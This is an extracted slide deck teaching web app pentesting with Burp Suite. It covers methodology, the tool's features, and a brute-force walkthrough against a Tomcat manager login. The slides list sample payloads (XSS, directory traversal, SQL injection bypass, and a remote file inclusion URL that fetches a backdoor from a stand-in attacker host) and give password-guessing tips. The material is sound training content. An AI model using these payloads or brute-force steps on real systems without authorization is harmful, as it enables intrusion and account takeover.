83
Introduction to b App Pentesting & Burp Suite 1

Web Hacking With Burp Suite 101

Embed Size (px)

Citation preview

Page 1: Web Hacking With Burp Suite 101

Introduction to Web App Pentesting & Burp Suite 101

Page 2: Web Hacking With Burp Suite 101

Build | Protect | Learn

Agenda

2

• $whoami• Overview of Web App Testing &

Vulnerabilities• Burp Suite Overview• Getting Started With Burp Suite• Automated Testing• Manual Testing• Other Features in Burp• Manual Testing Mindset & Example• Additional Web Hack Tips N Tricks• Useful Resources & Conclusion

Page 3: Web Hacking With Burp Suite 101

Build | Protect | Learn

~$ whoami

3

• InfoSec Geek • Pentester @ BreakPoint Labs (0xcc_labs)• Contributor to Primal Security Blog and Podcast• @b3armunch (Personal Infosec Twitter)• Certification Enthusiast (OSCP,GWAPT, GPEN,

etc.)• I Love Knowing What’s Going On (emerging vulns,

tools, PoC), CTFs, Offensive Security Work, Football and Trying New Beers.

Page 4: Web Hacking With Burp Suite 101

Build | Protect | Learn

Full Disclosure!

4

• ALWAYS test what your about to learn in a lab environment or when you have permission!

• What I cover isn’t everything, but it’s enough to hopefully get you familiar and started with using Burp Suite

Page 5: Web Hacking With Burp Suite 101

Build | Protect | Learn 5

I Promise NOOOOO…

Page 6: Web Hacking With Burp Suite 101

Build | Protect | Learn

Overview

6

• Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we leverage on every web assessment.

• Motivation: Burp Suite could be one of your foundation tools that you leverage throughout your entire web assessment.

- Burp Provides manual and automated testing capabilities.- Burp has a free and paid for version. (currently $349 per year)

• Quick Note: Static vs. Dynamic Web ContentStatic Content: Informational web content that tends to lack user features and capabilities.

Dynamic Content: Content that allows for user input to be passed to the server.

Page 7: Web Hacking With Burp Suite 101

Build | Protect | Learn

Web App Testing Methodologies

7

• Having an established testing methodology is an important first step.

• Create Checklists and templates to reassure the assessments process.

• Several great methodologies out there:Pentesting Execution Standard (PTES)OWASP Testing Guide (OTG) 4.0Web Application Hackers Handbook Task Checklist

• Any great methodology will include both Automated and Manual testing.

Page 8: Web Hacking With Burp Suite 101

Build | Protect | Learn

Common Web Vulnerabilities

8

• Cross-Site Scripting (XSS): When an attacker can embed scripts in a page that executed client side (in the user’s web browser).

<script>alert(“hello”)</script>

• Directory Traversal: Used by an attacker to gain unauthorized access to restricted directories and resources on the web server.

index.php?q=../../../../../etc/password

• Cross-Site Request Forgery: An attack that forces an end user to execute unwanted actions on a web application that the end user is currently authenticated too.

http://testbank.com/transfer.php?acct=BadBob&amount=500

• Open Redirect Vulnerabilities: An application that takes a parameter and then redirects a user to the manipulated parameter value without any input validation.

index.php?redirect=https://badboysite.com

Page 9: Web Hacking With Burp Suite 101

Build | Protect | Learn

Common Web Vulnerabilities

9

• SQL Injection: A form of code injection used against data driven applications with malicious SQL statements being inserted into a data entry field or parameter value for execution.

username: admin’– (Attempts to log you in as the admin user, with the rest of the SQL Query being ignored.)

• Brute Force Attacks: A trial and error method used to obtain authentication to a web application. (username, password, pin, etc.)

• Remote File Inclusion (RFI): The ability to include links to remote files through the exploitation of a vulnerable inclusion procedures implemented on the app.

http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php

• Local File Inclusion (LFI): The vulnerability occurs when a page include is not properly sanitized and an adversary can request a file located on the server through a web browser.

Page 10: Web Hacking With Burp Suite 101

Build | Protect | Learn

Web App Testing Procedure

10

1) Scoping: Laying the land through a questionnaire or conference call. (Always document though)

2) Recon & Mapping: What’s the size and technologies of the applications? (Spidering, Mapping and OSINT)

3) Automated Testing: Scan All The Things! (Utilizing Automated Scanners and open source testing tools too)

4) Manual Testing: Enumerate potential areas of interest and validated any automated tool findings (Abuse features, test injection points and reduce false positives)

5) Reporting: Essentially putting all your hard work into one document.

6) Remediation & Review: Provide support and re-testing of findings once remediated

Page 11: Web Hacking With Burp Suite 101

Build | Protect | Learn

Burp Suite Overview

11

Often Burp will be leveraged for its interception proxy capabilities.

• Proxy: Intercept, Capture and Log Requests• Spider: Discover Linked Content• Scanner: Active Web App Vulnerability Scanner• Intruder: Automate your testing through injection points • Repeater: Take a request and manipulate it to analyze the response further• Sequencer: Analyze Tokens (Are they randomly generated?)• Encoder/Decoder: Take encode or decode strings (URL, Base64, HTML)• Comparer: Take two things and compare them side by side• Extender: TONS of extensions to expand the features in Burp

Page 12: Web Hacking With Burp Suite 101

Build | Protect | Learn 12

• So Enough Talk….Let’s Actually Learn How to Use Burp!

Let’s Begin

Page 13: Web Hacking With Burp Suite 101

Build | Protect | Learn 13

Launching Burp• Burp Suite is a java jar file that can either be double clicked

or run from the CLI. The following syntax can launch burp:

java –jar –Xmx1024m burpsuite.jar

Page 14: Web Hacking With Burp Suite 101

Build | Protect | Learn 14

Burps Proxy• Burps proxy is an intercepting proxy server that

operates as a man-in-the-middle between your browser and the target web application.

Page 15: Web Hacking With Burp Suite 101

Build | Protect | Learn 15

Setting Up Your Browser

Page 16: Web Hacking With Burp Suite 101

Build | Protect | Learn 16

Burps Proxy Settings

Page 17: Web Hacking With Burp Suite 101

Build | Protect | Learn 17

Common Issue….

Page 18: Web Hacking With Burp Suite 101

Build | Protect | Learn 18

Define Your Scope

Page 19: Web Hacking With Burp Suite 101

Build | Protect | Learn 19

Map Your App (Click through)• Understand the apps purpose

• What Features are allowed?

• Can you sign in?

• View the Source

• Observe the file and directory structure

• What technologies are in use? (Wappalyzer)

• Is information being displayed that I can control?

• Does the app appear to interact with a database?

Page 20: Web Hacking With Burp Suite 101

Build | Protect | Learn 20

Spider (Linked Content)

Page 21: Web Hacking With Burp Suite 101

Build | Protect | Learn 21

Building Your Site MapThe Site Map Tree View contains a hierarchical representation of content, with URLs broken down into domains, directories, files, and parameterized requests.

Page 22: Web Hacking With Burp Suite 101

Build | Protect | Learn 22

Spider (Linked Content)

Page 23: Web Hacking With Burp Suite 101

Build | Protect | Learn 23

Filter Content In Your Site Map

Page 24: Web Hacking With Burp Suite 101

Build | Protect | Learn 24

Filtering Can Lead to…• Client side comments (Easter eggs the developer left behind!)

• Email Addresses (Potential leveraged for logins)

• Internal Path Disclosure

• Unlinked Files or Paths

• Potentially usernames and passwords (not very likely)

• Technology Enumeration

Page 25: Web Hacking With Burp Suite 101

Build | Protect | Learn 25

Analyze Your Target

Page 26: Web Hacking With Burp Suite 101

Build | Protect | Learn 26

Target Analyzer SummaryStatic Content: Essentially content that could be considered “flat files”, meaning what you see is what you get!

Often times static content is used to present end users news or information

Dynamic Content: Allows for user interaction and communicates with “back end” or “server-side” requests from the application.

Think of a search engine or login form.

Page 27: Web Hacking With Burp Suite 101

Build | Protect | Learn 27

HTTP History & Comments

Page 28: Web Hacking With Burp Suite 101

Build | Protect | Learn

Automated Testing

28

Automated Testing

Page 29: Web Hacking With Burp Suite 101

Build | Protect | Learn 29

Automated Testing Will Miss Stuff

• The DHS National NCATS organization reported that 67% of high impact vulnerabilities required manual testing to enumerate.

Page 30: Web Hacking With Burp Suite 101

Build | Protect | Learn 30

Automated Testing Can Break Stuff

Page 31: Web Hacking With Burp Suite 101

Build | Protect | Learn 31

Automated Testing Can Take a Long Time

Page 32: Web Hacking With Burp Suite 101

Build | Protect | Learn 32

Automated Testing Can Have False Positives

• Burp: Right-Click -> [Send to Repeater] [Request in Browser]

Page 33: Web Hacking With Burp Suite 101

Build | Protect | Learn 33

Burps Automated Scan Wizard

Page 34: Web Hacking With Burp Suite 101

Build | Protect | Learn 34

Burps Automated Scan Queue

Page 35: Web Hacking With Burp Suite 101

Build | Protect | Learn 35

Burps Automated Scan Results

Page 36: Web Hacking With Burp Suite 101

Build | Protect | Learn 36

Generate a Burp Scan Report

Page 37: Web Hacking With Burp Suite 101

Build | Protect | Learn 37

Burp Automated Scan Report• Burp Scanner Report will include: Finding Issue Details, Severity,

Confidence, Request, Response, etc...

Page 38: Web Hacking With Burp Suite 101

Build | Protect | Learn

Automated Testing

38

Manual Testing

Page 39: Web Hacking With Burp Suite 101

Build | Protect | Learn 39

Some Things To Think About • What technology is in use?• Ensure that you properly mapped the application• Enumerate all technology features (File upload, Comments, etc.)• Enumerate all areas of user input "Injection Points"• Can you figure what is being done with your input?• Is your input being presented on the screen? -> XSS• Is your input calling on stored data? -> SQLi• Does input generate an action to an external service? -> SSRF• Does your input call on a local or remote file? -> File Inclusion• Does your input end up on the file system? -> File Upload

• Think OWASP Top TEN….

Page 40: Web Hacking With Burp Suite 101

Build | Protect | Learn 40

OWASP Top Ten Snap Shot

Source: https://www.owasp.org/index.php/Top_10_2013-Top_10

Page 41: Web Hacking With Burp Suite 101

Build | Protect | Learn 41

Analyze Scan Results > Repeater (1)

Page 42: Web Hacking With Burp Suite 101

Build | Protect | Learn 42

Test, Modify & Repeat

Page 43: Web Hacking With Burp Suite 101

Build | Protect | Learn 43

Analyze Scan Results > Repeater (2)

Page 44: Web Hacking With Burp Suite 101

Build | Protect | Learn 44

Verify Results (XSS Example - False Positive)

Page 45: Web Hacking With Burp Suite 101

Build | Protect | Learn 45

Verify Results (XSS Example -Successful)

Page 46: Web Hacking With Burp Suite 101

Build | Protect | Learn 46

Think About How Input Is Being Used

Think about how to attack the following parameters and their values?

http://example-site.com/index.php?redirect=/contact/contact-us.php

http://example-site.com/index.php?file=/app/load.php

http://example-site.com/index.php?name=zack

http://example-site.com/index.php?search=exploitdb

http://example-site.com/index.php?sql=SELECT * FROM USERS

Page 47: Web Hacking With Burp Suite 101

Build | Protect | Learn 47

Burps Intruder

Page 48: Web Hacking With Burp Suite 101

Build | Protect | Learn 48

Custom Fuzzing

• FuzzDB, Raft Lists, and SecLists provide great lists for customer fuzzing.• As you start to understand how your input is being leveraged you can

start your fuzzing in an automated manner. • Burp Suite Pro’s Intruder is my go to tool for web application fuzzing.

Page 49: Web Hacking With Burp Suite 101

Build | Protect | Learn 49

Unlinked Content Treasures!• Use Burps Pre-Built Payload Lists for Fuzzing (Intruder Pro Version Only)

• Use Commonly known lists from tools like Dirbuster or Wfuzz (We can enable Burp to add any new findings to our site map!)

• Use the “SecLists” collection and it’s lists broken down by the following:- Passwords - Usernames- Discovery (Collection of general and specified directories/ resources) - Fuzzing (Collection of various payloads sorted by attack type)- Miscellaneous (Common Ports, Files extensions, list of US cities,

etc.)- Pattern Matching (Good for the grep utility through file contents)- IOCs (Indicators of compromise [ Malicious domains, IPs, files, etc.)- New Feature: RobotsDisallowed (Disallowed directories from the robots.txt files of the world's top websites--specifically the Alexa 100K.)

^ Source: https://github.com/danielmiessler/SecLists

Page 50: Web Hacking With Burp Suite 101

Build | Protect | Learn 50

Define Your Intruder Method

• Sniper – Sends a single set of payloads to a selected parameter(s) value to identify vulnerabilities.

• Battering Ram – Sends a single payload to all payloads marked at once. It iterates through the payloads, and places the same payload into all of the defined payload positions at once.

• Pitchfork – Sends a specific payload to each of the selected parameters in sequence. Each area of interest is passed its own designated values in a sequenced series of requests.

• Cluster Bomb – All payloads are tested with all the variables given meaning that all permutations of payload combinations are tested. (WARNING this is the largest and longest attack method often)

Page 51: Web Hacking With Burp Suite 101

Build | Protect | Learn 51

Burps Intruder Set Your Position

Page 52: Web Hacking With Burp Suite 101

Build | Protect | Learn 52

Define the Intruder Payload List

Page 53: Web Hacking With Burp Suite 101

Build | Protect | Learn 53

Intruders Results (Status | Length)Note: You May Want to Uncheck Payload Encoding If not Needed!!!!

Page 54: Web Hacking With Burp Suite 101

Build | Protect | Learn 54

Burp Pro’s Discover Content (Unlinked)

Page 55: Web Hacking With Burp Suite 101

Build | Protect | Learn 55

Burps Discover Content Options

Page 56: Web Hacking With Burp Suite 101

Build | Protect | Learn 56

Burps Discover Content Session Status

Page 57: Web Hacking With Burp Suite 101

Build | Protect | Learn 57

Other Features in Burp…

Page 58: Web Hacking With Burp Suite 101

Build | Protect | Learn 58

Burps Encoder/Decoder

Page 59: Web Hacking With Burp Suite 101

Build | Protect | Learn 59

Burps Comparer

Key: Modified | Deleted | Added

Page 60: Web Hacking With Burp Suite 101

Build | Protect | Learn 60

Burps Sequencer

Page 61: Web Hacking With Burp Suite 101

Build | Protect | Learn 61

Burps Extender

Page 62: Web Hacking With Burp Suite 101

Build | Protect | Learn 62

Manual Testing Mindset & Example• Now let’s cover a basic example of how we can

compromise a web application through several features that we can abuse!

Page 63: Web Hacking With Burp Suite 101

Build | Protect | Learn 63

Weak Authentication Mechanism • Very common finding with web application penetration testing• Often combines several vulnerabilities:

- Username enumeration (Low) +- Lack of Automation Controls (Low) +- Lack of Password Complexity Requirements (Low) =- Account Compromise (Critical)

Page 64: Web Hacking With Burp Suite 101

Build | Protect | Learn 64

Weak Authentication: Username Enumeration

• Password Reset Features “Email address not found”• Login Error Messages “Invalid Username”• Timing for login Attempts: Valid = 0.4 secs Invalid = 15 secs• User Registration “Username already exists”• Various error messages, and HTML source• Contact Us Features “Which Admin do you want to contact?”• Google Hacking and OSINT• Document Metadata• Sometimes the application tells you!

Page 65: Web Hacking With Burp Suite 101

Build | Protect | Learn 65

Weak Authentication: Automation Controls

• Pull the authentication request up in Burp’s Repeater and try it a few times.

• If you see no sign of automation controls send to Burp’s Intruder for more aggressive testing.

- No account lockout- No/Weak CAPTCHA- Main login is strong, but other resources are not

(Mobile Interface, API, etc.)

Page 66: Web Hacking With Burp Suite 101

Build | Protect | Learn 66

Weak Authentication: Weak Passwords

• We as humans are bad at passwords…here are some tricks that work for me:

- Password the same as username- Variations of “password”: “p@ssw0rd”…- Month+Year, Season+Year: summer2016…- Company Name + year- Keyboard Walks – PW Generator: “!QAZ2wsx”- My Favorites…Burp Pros Built in Wordlist or SecList

Password Files

• Lots of wordlists out there, consider making a targeted wordlist using CeWL (scrape sites for unique keywords).

• Research the targeted user’s interests and build lists around those interests.

Page 67: Web Hacking With Burp Suite 101

Build | Protect | Learn 67

Piecing Together What We Know…

• We have enumerated that theirs a valid account named “tomcat” from the password reset functionality in the forms based login (Also a default account for Apache Tomcat).

• The application also has basic authentication protecting its “ tomcat manager” login on port 8080 (No lockout built in and will need to base64 encode payloads).

• We know theirs a lack of password complexity, since we made a test account with a password of “password”. (create account feature abuse)

• Let’s leverage Burp’s Intruder to brute force…

Page 68: Web Hacking With Burp Suite 101

Build | Protect | Learn 68

Manipulating Our Target Request

1. View our HTTP History Under the Proxy Tab.2. Find our HTTP Request for the Tomcat

‘/manager/html’ login resource.3. Send our request to Burps Intruder.

Page 69: Web Hacking With Burp Suite 101

Build | Protect | Learn 69

Burp Intruder Payload Configuration

4. Add the § Payload Markers § around the Basic Authorization Value with the Sniper Attack.

Page 70: Web Hacking With Burp Suite 101

Build | Protect | Learn 70

Analyze Your Encoded Payload

To provider further context let’s decode our sample login attempt to the tomcat login > Send to Burps Decoder > Base64 Decode and we can see our attempt in plaintext.

(i.e.) tomcat:password

Page 71: Web Hacking With Burp Suite 101

Build | Protect | Learn 71

Burp Intruder Payload Set Up

5. Custom Iterator and Position 1 Set 6. Set Position 1 Separator “:”

7. Set Position 2 Password List

Page 72: Web Hacking With Burp Suite 101

Build | Protect | Learn 72

Payload Processing Base64 Encode

8. Add a Payload Processing Rule > Encode > Base-64 Encode Your Payload > Properly submits our Brute Force Attempts!!!

Page 73: Web Hacking With Burp Suite 101

Build | Protect | Learn 73

Start Intruder & Review Results

9. Look for a variance in your HTTP Status or Length of Response From Your Payload Attempts.

Page 74: Web Hacking With Burp Suite 101

Build | Protect | Learn 74

ACHIEVEMENT UNLOCKED!!!!

Page 75: Web Hacking With Burp Suite 101

Build | Protect | Learn 75

Additional Web Hack Tips N Tricks

Page 76: Web Hacking With Burp Suite 101

Build | Protect | Learn 76

Reconnaissance: Identify New Systems and Content

• Companies are normally quite surprised about what is exposed to the Internet.

• How do you tackle large /8’s, /16’s, how do you even build out this footprint starting with a company name?

- Shodan + Censys.io (3rd Party DBs with Port/Service Info)- Domain + IP Research (Host, Dig, Whois, etc)- Masscan + Nmap (Identify open ports and services)- Whatweb + Wappalayzer (ID Tech Stack)- Google, Bing, etc. (Search Syntax)- OSINT: Company Mergers + Acquisitions (Expand Scope?)

Page 77: Web Hacking With Burp Suite 101

Build | Protect | Learn 77

Big Scope? Quick Visual: Eye Witness

• EyeWitness is a tool that takes in URLs and creates a report with server headers + Screen shot of the web GUI

• Extremely useful when facing a large scope

Page 78: Web Hacking With Burp Suite 101

Build | Protect | Learn 78

Don’t Judge a System By It’s IP• Requesting an application URL by IP might give back different content vs.

the domain.

• Load Balancing could exist to where an application could be mirrored across several IP addresses (Commonly seen with large sites i.e. banks).

• Keep in mind you can have several applications living on the same IP (Virtual Hosting).

• Pointing an automated tool to “http://ip/” may miss a lot of stuff vs. “http://ip/AppIsHere/”.

Page 79: Web Hacking With Burp Suite 101

Build | Protect | Learn 79

Shot in The Dark “Nikto” Scan• Open Source web application vulnerability scanner that checks for low

hanging fruit vulnerabilities and some old goodies. (False Positives will happen!)

Page 80: Web Hacking With Burp Suite 101

Build | Protect | Learn 80

Version Specific Vulnerabilities• Enumerating the technology and version in use go a long way with

finding vulnerabilities (Google + Exploit-db)

• What do I know about the technology and how can I find more information?

Page 81: Web Hacking With Burp Suite 101

Build | Protect | Learn 81

Build Your Own Custom Report• We leverage Markdown for Custom Reporting to give our reports

in a HTML format. Common Findings Database - Check it out

Page 82: Web Hacking With Burp Suite 101

Build | Protect | Learn 82

Useful Resources

• CTFs: Vulnhub, Past CTF Writeups, Pentester Lab• Training: GWAPT , Offensive Security• Book: Web Application Hackers Handbook• Talk: How to Shot Web - Jason Haddix• Talk: How to be an InfoSec Geek - Primal Security• Talk: File in the hole! - Soroush Dalili• Talk: Polyglot Payloads in Practice - Marcus Niemietz• Talk: Running Away From Security - Micah Hoffman• Github Resource: Security Lists For Fun & Profit

• BPL Blog Post on this Talk:

Page 83: Web Hacking With Burp Suite 101

Build | Protect | Learn 83

Conclusion

Email: [email protected]

• Burp Suite is a great baseline tool to leverage in all your future web assessments.

• OWASP has a large abundance of information to reference and learn from.

• Read blogs and twitter whenever possible, often times dozens of web vulnerabilities and potential exploits are released every day.